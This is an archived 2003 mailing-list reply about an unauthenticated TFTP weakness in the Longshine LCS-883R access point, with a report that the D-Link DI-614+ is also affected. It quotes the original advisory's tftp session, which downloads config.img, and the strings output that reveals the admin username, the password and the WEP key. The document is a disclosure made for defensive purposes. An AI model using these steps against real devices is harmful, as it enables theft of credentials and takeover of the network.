Re: Longshine WLAN Access-Point LCS-883R VU#310201

From: heydownsat_private
Date: Mon Jan 06 2003 - 10:57:52 PST

Next message: itzhakat_private: "Bookmar4U and Active PHP Bookmarks Vulnerabilities"

Previous message: Tiina Anita Muukkonen: "[VulnWatch] Re: Opentype font file causes Windows to restart."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This vulnerability is also an issue on the popular DLink DI-614+ (which I
think is based upon the Longshine product).  I was able to grab config.img
and also extract the "admin" password from it. This was confirmed with
firmware version 2.03 dated 9/10/2002.

On the DLink product, you can only perform this from the "LAN-side" of the 
device in the default configuration.

DLink has version 2.10 available, dated 11/25/2002, but I have not tried 
it yet.

	-Jeff

On Mon, 6 Jan 2003, Lukas Grunwald wrote:

> 
> 
> Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps 
> 
> Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
> 
> Description: Get Superuser Privileges and view the devices password and password and other passwords 
> 
> Versions affected: tested with  03.01.0b and 03.01.0h
> 
> Vendor contacted: e-mailed Longshine at Sun Dec 29 
> 
> Details: You are able to connect via tftp to the access-point an you can get download the configuration
> without authentication the WEP Secret for the encryption and the password from your radius server is also readable.
> In this configuration in the Username of the Superuser and the corresponding password stored.
> The WEP Secret for the encryption and the password from your radius server is also readable.
> This "attack" works via WLAN (!!!) and Ethernet.
> 
> tftp
> tftp> connect 192.168.108.48
> tftp> get config.img
> Received 780 bytes in 1.0 seconds
> tftp> quit
> 
> [~]/-\>strings config.img 
> DNXLABAP01 <- name of the AP
> root	   <- name of the superuser
> XXXXXX123  <- password from superuser
> DNXLABLAN  <- ssid
> secu9	   <- secret for WEP
> 7890abcdef <-
> 
> You are also able to get the following files:
> 
> config.img 
> wbtune.dat
> mac.dat
> rom.img
> normal.img
> 
> 
> Solution: after contact with the vendor he claims that a new firmware-upgrade 
> fixes this problem, but the latest available firmware on his web-page 
> dosn't fix it anyway.
> 
> Vendor-Contact:
> 
> LONGSHINE  Technologie (Europe) GmbH
> 
> An der Strusbek 9
> D-22926 Ahrensburg
> 
> Tel: ++ 49 ( 0 ) 4102 / 4922- 0
> Fax: ++ 49 ( 0 ) 4102 / 40109
> 
> supportat_private
>

Next message: itzhakat_private: "Bookmar4U and Active PHP Bookmarks Vulnerabilities"
Previous message: Tiina Anita Muukkonen: "[VulnWatch] Re: Opentype font file causes Windows to restart."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jan 06 2003 - 20:10:10 PST